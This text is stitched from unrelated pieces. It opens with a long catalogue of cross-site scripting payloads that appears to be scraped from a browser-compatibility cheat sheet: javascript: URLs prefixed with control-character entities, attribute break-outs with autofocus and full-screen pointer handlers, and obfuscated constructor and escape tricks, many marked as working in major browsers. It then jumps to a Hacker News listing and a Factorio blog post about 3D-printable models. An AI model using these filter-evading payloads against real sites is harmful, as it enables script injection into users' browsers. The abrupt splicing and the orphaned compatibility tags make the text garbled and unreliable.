&#24;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#25; entity (prefix, with ;) (attribute_href)

&#25;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#26; entity (prefix, with ;) (attribute_href)

&#26;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#27; entity (prefix, with ;) (attribute_href)

&#27;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#28; entity (prefix, with ;) (attribute_href)

&#28;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#29; entity (prefix, with ;) (attribute_href)

&#29;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#30; entity (prefix, with ;) (attribute_href)

&#30;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#31; entity (prefix, with ;) (attribute_href)

&#31;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1; entity (prefix, with ;) (attribute_href)

&#x1;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x2; entity (prefix, with ;) (attribute_href)

&#x2;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x3; entity (prefix, with ;) (attribute_href)

&#x3;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x4; entity (prefix, with ;) (attribute_href)

&#x4;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x5; entity (prefix, with ;) (attribute_href)

&#x5;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x6; entity (prefix, with ;) (attribute_href)

&#x6;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x7; entity (prefix, with ;) (attribute_href)

&#x7;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x8; entity (prefix, with ;) (attribute_href)

&#x8;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x9; entity (prefix, with ;) (attribute_href)

&#x9;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#xa; entity (prefix, with ;) (attribute_href)

&#xa;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#xb; entity (prefix, with ;) (attribute_href)

&#xb;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#xc; entity (prefix, with ;) (attribute_href)

&#xc;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#xd; entity (prefix, with ;) (attribute_href)

&#xd;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#xe; entity (prefix, with ;) (attribute_href)

&#xe;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#xf; entity (prefix, with ;) (attribute_href)

&#xf;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x10; entity (prefix, with ;) (attribute_href)

&#x10;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x11; entity (prefix, with ;) (attribute_href)

&#x11;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x12; entity (prefix, with ;) (attribute_href)

&#x12;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x13; entity (prefix, with ;) (attribute_href)

&#x13;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x14; entity (prefix, with ;) (attribute_href)

&#x14;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x15; entity (prefix, with ;) (attribute_href)

&#x15;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x16; entity (prefix, with ;) (attribute_href)

&#x16;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x17; entity (prefix, with ;) (attribute_href)

&#x17;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x18; entity (prefix, with ;) (attribute_href)

&#x18;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x19; entity (prefix, with ;) (attribute_href)

&#x19;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1a; entity (prefix, with ;) (attribute_href)

&#x1a;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1b; entity (prefix, with ;) (attribute_href)

&#x1b;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1c; entity (prefix, with ;) (attribute_href)

&#x1c;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1d; entity (prefix, with ;) (attribute_href)

&#x1d;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1e; entity (prefix, with ;) (attribute_href)

&#x1e;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x1f; entity (prefix, with ;) (attribute_href)

&#x1f;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

atob.constructor() (js_string_single)

'-atob.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

btob.constructor() (js_string_single)

'-btob.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

Ink.constructor() (js_string_single)

'-Ink.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

HID.constructor() (js_string_single)

'-HID.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

GPU.constructor() (js_string_single)

'-GPU.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

when.constructor() (js_string_single)

'-when.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

find.constructor() (js_string_single)

'-find.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

print.constructor() (js_string_single)

'-print.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

Set.constructor() (js_string_single)

'-Set.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

{}.constructor.constructor() (js_string_single)

'-{}.constructor.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

''.constructor.constructor() (js_string_single)

'-''.constructor.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

[].constructor.constructor() (js_string_single)

'-[].constructor.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

0..constructor.constructor() (js_string_single)

'-0..constructor.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

0n.constructor.constructor() (js_string_single)

'-0n.constructor.constructor('a'+'lert(1)')()-'

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

location.replace(javascript:) (js_string_single)

'-location.replace('javascript:a\lert(1)')-'

Works in Chrome Works in Firefox Works in Safari

location='javascript:a\lert(1)' (js_string_single)

'-[location='javascript:a\lert(1)']-'

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocus (slash-sep) +tabindex +autofocus (attribute_double)

"/onfocus=alert(1) tabindex=1 autofocus/

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocusin (slash-sep) +tabindex +autofocus (attribute_double)

"/onfocusin=alert(1) tabindex=1 autofocus/

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerdown (slash-sep) (attribute_double) #2

"/onpointerdown=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocus (slash-sep) +autofocus (attribute_double)

"/onfocus=alert(1) autofocus/

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocusin (slash-sep) +autofocus (attribute_double)

"/onfocusin=alert(1) autofocus/

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerenter (slash-sep) (attribute_double) #2

"/onpointerenter=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointermove (slash-sep) (attribute_double) #2

"/onpointermove=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerover (slash-sep) (attribute_double) #2

"/onpointerover=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerrawupdate (slash-sep) (attribute_double) #2

"/onpointerrawupdate=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerdown (slash-sep) (attribute_double) #3

"/onpointerdown=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerdown (slash-sep) (attribute_double) #4

"/onpointerdown=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocus (unquoted) +autofocus (attribute_unquoted)

1 onfocus=alert(1) autofocus/

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocusin (unquoted) +autofocus (attribute_unquoted)

1 onfocusin=alert(1) autofocus/

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerrawupdate (unquoted) (attribute_unquoted) #2

1 onpointerrawupdate=alert(1) style=position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0 /

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocus (quoted-handler) +autofocus (attribute_double)

"onfocus="alert(1)"/autofocus/

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onfocusin (quoted-handler) +autofocus (attribute_double)

"onfocusin="alert(1)"/autofocus/

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onmousemove (quoted-handler) (attribute_double)

"onmousemove="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onmouseenter (quoted-handler) (attribute_double)

"onmouseenter="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerenter (quoted-handler) (attribute_double)

"onpointerenter="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointermove (quoted-handler) (attribute_double)

"onpointermove="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerover (quoted-handler) (attribute_double)

"onpointerover="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerrawupdate (quoted-handler) (attribute_double)

"onpointerrawupdate="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

attribute break-out with onpointerdown (quoted-handler) (attribute_double)

"onpointerdown="alert(1)"style="position:fixed;width:100vw;height:100vh;z-index:100000;left:0;top:0" /

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using {}.constructor.constructor() (html)

<xss tabindex=1 autofocus onfocus={}.constructor.constructor('a'+'lert(1)')()>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using ''.constructor.constructor() (html)

<xss tabindex=1 autofocus onfocus=''.constructor.constructor('a'+'lert(1)')()>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using [].constructor.constructor() (html)

<xss tabindex=1 autofocus onfocus=[].constructor.constructor('a'+'lert(1)')()>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0..constructor.constructor() (html)

<xss tabindex=1 autofocus onfocus=0..constructor.constructor('a'+'lert(1)')()>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0n.constructor.constructor() (html)

<xss tabindex=1 autofocus onfocus=0n.constructor.constructor('a'+'lert(1)')()>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using location.replace(javascript:) (html)

<xss tabindex=1 autofocus onfocus=location.replace('javascript:a\lert(1)')>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using location='javascript:a\lert(1)' (html)

<xss tabindex=1 autofocus onfocus=location='javascript:a\lert(1)'>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using location=self.name (html)

<xss tabindex=1 autofocus onfocus=location=self.name>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using location=frames.name (html)

<xss tabindex=1 autofocus onfocus=location=frames.name>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using location=globalThis.name (html)

<xss tabindex=1 autofocus onfocus=location=globalThis.name>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using location=globalThis.name (html) #2

<xss tabindex=1 autofocus onfocus=location=globalThis.name>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw self.onerror=alert + /**/ comment as space + &#97 entity in JS (html)

<xss tabindex=1 autofocus onfocus=throw/**/self.onerror=&#97lert,1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw frames.onerror=alert + /**/ comment as space + &#97 entity in JS (html)

<xss tabindex=1 autofocus onfocus=throw/**/frames.onerror=&#97lert,1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw globalThis.onerror=alert + /**/ comment as space + &#97 entity in JS (html)

<xss tabindex=1 autofocus onfocus=throw/**/globalThis.onerror=&#97lert,1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw self.onerror=alert + &#97 entity in JS + quoted handler value (html)

<xss tabindex=1 autofocus onfocus="throw self.onerror=&#97lert,1">

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw frames.onerror=alert + &#97 entity in JS + quoted handler value (html)

<xss tabindex=1 autofocus onfocus="throw frames.onerror=&#97lert,1">

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw globalThis.onerror=alert + &#97 entity in JS + quoted handler value (html)

<xss tabindex=1 autofocus onfocus="throw globalThis.onerror=&#97lert,1">

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw defaultView.onerror=alert + &#97 entity in JS + quoted handler value (html)

<xss tabindex=1 autofocus onfocus="throw defaultView.onerror=&#97lert,1">

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw defaultView.onerror=alert + defaultView[] access + quoted handler value (html)

<xss title=aler id=t tabindex=1 autofocus onfocus="throw defaultView.onerror=defaultView[title+id],1">

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw defaultView.onerror=alert + &Tab; as space + defaultView[] access (html)

<xss title=aler id=t tabindex=1 autofocus onfocus=throw&Tab;defaultView.onerror=defaultView[title+id],1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw defaultView.onerror=alert + &#32 as space + defaultView[] access (html)

<xss title=aler id=t tabindex=1 autofocus onfocus=throw&#32defaultView.onerror=defaultView[title+id],1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw self.onerror=alert + &#32 as space + self[] access (html)

<xss title=aler id=t tabindex=1 autofocus onfocus=throw&#32self.onerror=self[title+id],1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw globalThis.onerror=alert + &#32 as space + globalThis[] access (html)

<xss title=aler id=t tabindex=1 autofocus onfocus=throw&#32globalThis.onerror=globalThis[title+id],1>

Works in Chrome Works in Firefox Works in Safari

<xss> with onerror+onfocus using throw frames.onerror=alert + &#32 as space + frames[] access (html)

<xss title=aler id=t tabindex=1 autofocus onfocus=throw&#32frames.onerror=frames[title+id],1>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using window[] access (html)

<xss tabindex=1 autofocus onfocus=window['a'+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using template-literal `a` string + window[] access (html)

<xss tabindex=1 autofocus onfocus=window[`a`+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \u0061 escape (html)

<xss tabindex=1 autofocus onfocus=\u0061lert(1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \u{0061} escape (html)

<xss tabindex=1 autofocus onfocus=\u{0061}lert(1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \u{61} escape (html)

<xss tabindex=1 autofocus onfocus=\u{61}lert(1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \u{00000000000061} escape (html)

<xss tabindex=1 autofocus onfocus=\u{00000000000061}lert(1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using self[] access (html)

<xss tabindex=1 autofocus onfocus=self['a'+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using template-literal `a` string + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[`${`a`}lert`](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \a literal in string + self[] access (html)

<xss tabindex=1 autofocus onfocus=self['\a'+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \x61 escape + self[] access (html)

<xss tabindex=1 autofocus onfocus=self['\x61'+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using \141 octal escape + self[] access (html)

<xss tabindex=1 autofocus onfocus=self['\141'+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using /a/.source + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[/a/.source+/lert/.source](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using atob.name[0] + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[atob.name[0]+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using atob.name[0] + self[] access (html) #2

<xss tabindex=1 autofocus onfocus=self[atob.name[0]+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using String.fromCharCode(0x61) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[String.fromCharCode(0x61)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using String.fromCodePoint(0x61) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[String.fromCodePoint(0x61)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 10..toString(17) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[10..toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 10n.toString(17) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[10n.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0xa.toString(17) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[0xa.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0b1010.toString(17) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[0b1010.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0o12.toString(17) + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[0o12.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using atob('YQ==') + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[atob('YQ==')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using unescape('%61') + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[unescape('%61')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using decodeURI('%61') + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[decodeURI('%61')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using decodeURIComponent('%61') + self[] access (html)

<xss tabindex=1 autofocus onfocus=self[decodeURIComponent('%61')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using +[] coercion + self[] access (html)

<xss tabindex=1 autofocus onfocus=self['a'+[]+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using frames[] access (html)

<xss tabindex=1 autofocus onfocus=frames['a'+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 10n.toString(17) + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[10n.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0xa.toString(17) + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[0xa.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0b1010.toString(17) + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[0b1010.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using 0o12.toString(17) + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[0o12.toString(17)+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using atob('YQ==') + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[atob('YQ==')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using unescape('%61') + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[unescape('%61')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using decodeURI('%61') + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[decodeURI('%61')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using decodeURIComponent('%61') + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView[decodeURIComponent('%61')+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using +[] coercion + defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView['a'+[]+'lert'](1)>

Works in Chrome Works in Firefox Works in Safari

<xss> with onfocus using defaultView[] access (html)

<xss tabindex=1 autofocus onfocus=defaultView['a'+'lert'](1)>

Show HN: Jev Plays Pokémon Red

Hacker News
jev-pokemon.vercel.app
2026-09-25 10:28:07
Comments...
Original Article

STARTS MUTED. UNMUTE FOR GAME AUDIO.
THE RIGHT PANEL SHOWS EVERY DECISION AND JEV'S ODDS.

OAK: JEV only knew where to go next because it had a guide.

Your users need one too! FRIGADE is an AI assistant that learns your product on its own and shows each user the next step, right inside your app.

Factorio that you can touch

Hacker News
factorio.com
2026-09-25 10:24:42
Comments...
Original Article

Hello,
we have very unusual Friday facts for you.



Journey to the physical world Pard

It all started in the hot summer of 2024 when we worked really hard to finish the Space Age DLC. The game was almost ready, but we wanted some feedback from our players. A decision was made to organise a playtesting event ( FFF-427 ), where teams of players could play the game from start to finish and provide us with in-person feedback and criticism to deliver the best product you all deserved.

Since we are all geeks and love to tinker, we asked our friends at Prusa Research to join us and create some accompanying programmes and presentations for all attendees.

Being fans of Factorio themselves, they agreed to join, and the plan was put into motion. When the event started, we realised that it would be cool to print some Factorio models right at the event, so Fearghall quickly created a simple model of the Wriggler from everyone's favourite Gleba.

With the conclusion of our event, everyone returned to work on Factorio, but we all wanted to return to the idea of Factorio models in the real world. In the months following the release and subsequent bug-fixing and polishing period, we started working on some prototypes in our spare time. Several models were made, printed, and painted, but they lacked a concept. We let it sit for a while and brainstormed what would be the best direction. The answer was actually very simple: transport belts.

Belts are the core of every factory from the early hours to the very late game. Jarosław started designing the concept of a grid system where you could place every entity closely following the game. The first version of inserters soon followed. During this phase, we were printing countless prototypes. It soon became clear that we needed two versions of almost every model. One set of models is created with high precision, allowing push-fit assembly, and the other is made with high clearance in mind for people who want to glue everything permanently or have clearance issues with their printers.

While Jarosław was busy creating one player-built entity after the other, Fearghall started working on enemies. The first iteration of the biter spawner soon followed. Then came chests, followed by the player character, then a stone furnace… Our model set grew nicely, but we knew that we had to draw a line somewhere, because trying to release every Factorio entity would take too much time. With that in mind, we focused on the early game. We ended up with 15 model sets containing 65 individual models in 247 STL files.


1/17

Testing how far we can push the limits of model size.

2/17

Painting of the first enemy prototype to ensure that models will look good both in plain plastic and fully painted...

3/17

...Finished demolisher. The model was later scrapped because it wasn't really reflecting in-game visuals.

4/17

Several models in early stages of development. Belts were tested and fine-tuned for clearance issues. Enemies needed major updates.

5/17

Painting the biter spawner to determine whether the fully finished model adequately represents the original vision for the game...

6/17

...The biter spawner is now fully finished. Unfortunately, we realized that substantial changes are still needed.

7/17

Most entities went through a series of iterations. Countless print runs were associated with this process.

8/16

First test print of the biter. It was later resized, and it received many improvements for a smooth printing experience.

9/17

Fine-tuning of printer limits regarding potential model details on the spitter.

10/17

The final version of the spitter, finding enemies outside the world of Factorio.

11/17

Test print of the late version of the electric mining drill with a coat of silver primer.

12/17

Our catalogue of models was starting to gain momentum. At this point, we were confident that a public release was possible.

13/17

The biter spawner finally received a model update. It still wasn't finished, but we were getting much closer to the finish line.

14/17

The belt lane balancer is painted with model grass added. It was clear that complete dioramas are possible.

15/17

One of the earlier tests of walls and their integration into the grid system.

16/17

Testing how far we can push the limits of model sizes in the opposite direction. Joint modification was needed.

17/17

Finally, all the models are finished. Time to take some glamour shots.


Why 3D Printing? Pard

In the modern digital world, there is a decrease in physical memorabilia. Physical releases of games are now almost a relic of the past. We always thought about having something for fans and ourselves as a reminder of times that we spent with the game. We at Wube are a software company, not a toy manufacturer, and we have the best community in the world. Creating some expensive (limited) collector's items didn't sit right with us. We have decided to go with 3D models as a little "thank you for your support" gift so anyone can download them and print them for themselves.

A second equally important reason is that we love your creativity, and we want to give you a chance to iterate on things we created and give them your own spin. We can't wait to see it.


Reimagining of Factorio Jarosław

I will not lie, I slept on 3D printing for a while. It's probably for the best - I do have a passion for miniature-based board games and background as a 3D artist. So, when I finally took the risk and decided to look into it - well, let's say neither of my 3D printers has seen much downtime since then. Whether it's miniatures, card organizers, inserts or wall-high paint-stands, there is always something new to print. And of course, in case you are wondering, that does not make my "pile of shame" any smaller.

With this premise, I know you can imagine why my ears perked up when the first hints of 3D printed models for Factorio started circulating in the office. Little did I know I was soon to partake in one of the most fascinating endeavours I ever… well, partook in.

If you are a regular in these here parts, you will likely know all our entities start their life as 3D models. That might make it seem like translating them into prints would be an easy job - in all truth, I thought so, and I of all people should know better! The journey turned out to be a bit more complex than I originally imagined!

Transport Belts 1 Transport Belts 2 Belt Items 1 Belt Items 2 Belt Items 3 Belt Items 4 Chests 1 Chests 2 Chests 3 Chests 4 Chests 5 Walls

The most obvious problem concerning FDM printing is the issue of supports. If you are not well versed in how these printers work, you can imagine building a roof with LEGO bricks. An angled roof is easy - you just offset each next brick by a single row, and there is your roof. If you wanted to make a perfectly flat one, though? The bricks do not connect on the sides, so each next one would need to float in the air… unless there was something to support them from underneath. For our models, we wanted to avoid extra supports wherever possible - they can be visually distracting when made to stay, otherwise they can be a bother to remove. As such, part of my work was to find ways to separate our models into pieces that can be printed without supports and then connected into full models. Considering I am a fan of scale models and gunplas, it was an incredible experience to create my own!

Now, the other problem is a bit different in nature. How would I say it…? Factorio models tend to be really, really crazy (in the best possible way). Do you know the adage "what you see is what you get"? Well, yeah, no. Not at all applicable in this case!

Assembling Machine Electric Mining Drill Steel Furnace Stone Furnace Small Electric Pole

Factorio's isometric view gives a lot of space to experiment and play, and my fellow artists used that opportunity mercilessly. Sometimes what you see is, in fact, merely a collection of free-floating objects that just happen to look like a machine when looked at from the exact correct perspective. It rarely gets quite that bad, but the perspective is often a problem. There is a huge discrepancy between what the machines are and how they feel - all a function of the isometric view mixed with some creative light-and-shadow tricks. If you were to take a measuring tape to the mining drill for example, you might discover the North-South and the West-East variants are not quite identical - they do look like it, though! That problem goes double for height of the entities - in game, it is often restricted to fit in the grid-space of one tile, yet made to look much taller than that suggests. That created a unique and somewhat contradictory problem: designing 3D models that looked like Factorio models look, and not how they are.

